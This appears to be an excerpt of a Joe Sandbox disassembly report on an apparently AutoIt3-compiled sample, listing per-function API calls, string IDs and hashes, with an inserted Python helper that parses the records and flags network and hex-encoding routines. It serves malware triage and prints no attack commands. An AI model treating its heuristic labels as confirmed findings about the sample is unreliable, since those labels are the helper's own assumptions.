• Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 2652923123-3941886329
APIs
Strings
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
APIs
Strings
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                • API String ID: 2931989736-1010288
                                                                                                                                                                                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
• Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
• Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
• Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
• Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
• Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
• Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
• API String ID: 1921645428-436463671
• Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
• Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
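The function records above only become useful for triage once they are decoded: the second argument of each SendMessageW call is a window-message constant (0x1132 is TVM_INSERTITEMW and 0x1105 is TVM_GETCOUNT from CommCtrl.h; 0x143 is CB_ADDSTRING and 0x14E is CB_SETCURSEL from WinUser.h), the WININET reference marks the one URL-handling routine in this run, and _sprintf with a "%02X" format string is the usual byte-to-hex loop. The following Python helper is an added example, not Joe Sandbox code: it parses records in exactly the layout printed on this page, resolves the message constants against a small table, and flags network-capable and hex-encoding functions. The SAMPLE text is copied from three of the records above; the flags and the message table are this helper's own assumptions, not fields of the report.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Similarity" blocks) for triage.

Added helper for this page, not part of Joe Sandbox. It expects the record
layout shown in the report; the message table and the triage flags are this
helper's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Window-message constants seen in the records above (CommCtrl.h: TV_FIRST = 0x1100;
# WinUser.h: CB_ADDSTRING = 0x0143). Unknown values are reported as raw hex.
WINDOW_MESSAGES = {
    0x0143: "CB_ADDSTRING",
    0x014E: "CB_SETCURSEL",
    0x1105: "TVM_GETCOUNT",
    0x1132: "TVM_INSERTITEMW",
}

# "• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F" or
# "  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9"
API_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<func>\w+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
# Similarity fields worth keeping; "API String ID" deliberately does not match.
FIELD_RE = re.compile(
    r"^\s*[•*-]\s*(?P<key>API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)


@dataclass
class ApiRef:
    func: str
    module: str
    args: List[str]
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # set when the call is inside a callee


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    def messages(self) -> List[str]:
        """Resolve the uMsg (second) argument of every SendMessageW call."""
        names = []
        for a in self.apis:
            if a.func == "SendMessageW" and len(a.args) >= 2 and a.args[1] != "?":
                msg = int(a.args[1], 16)
                names.append(WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"))
        return names

    def touches_network(self) -> bool:
        return any(a.module in ("WININET", "WINHTTP", "WS2_32") for a in self.apis)

    def looks_like_hex_encoder(self) -> bool:
        # Heuristic (assumption): sprintf("%02X") in a loop is the classic
        # byte-to-hex routine used to encode binary data before sending it.
        return self.string_id == "%02X" and any(a.func == "_sprintf" for a in self.apis)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into one FunctionRecord per "APIs" heading."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [s.strip() for s in raw.split(",")] if raw is not None else []
            cur.apis.append(ApiRef(m.group("func"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        m = FIELD_RE.match(line)
        if m:
            setattr(cur, m.group("key").lower().replace(" ", "_"), m.group("val").strip())
    return records


def summarize(text: str) -> List[dict]:
    """One triage row per function: what it calls, decoded messages, flags."""
    rows = []
    for r in parse_records(text):
        rows.append({
            "api_id": r.api_id,
            "calls": [f"{a.module}!{a.func}@{a.ref}" for a in r.apis],
            "messages": r.messages(),
            "network": r.touches_network(),
            "hex_encoder": r.looks_like_hex_encoder(),
        })
    return rows


# Sample input copied from three records on this page (constructed excerpt).
SAMPLE = """\
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Similarity
• API ID: MessageSend
• String ID: '
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Paste the full "Disassembly" section of a saved report into SAMPLE (or read it from a file) and the summary gives, per recovered function, the imports it calls with their call-site addresses, the decoded window messages, and which functions are worth opening first in IDA: here the InternetCrackUrlW routine at 0x46682F and the "%02X" encoder around 0x40F9AE, while the two SendMessageW functions are plain tree-view and combo-box UI code.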
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: htonsinet_addr
                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
• Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
• Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
• Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
• Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
• Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
APIs
• _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00401B57
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
• String ID: @EXITCODE
• API String ID: 2734553683-3436989551
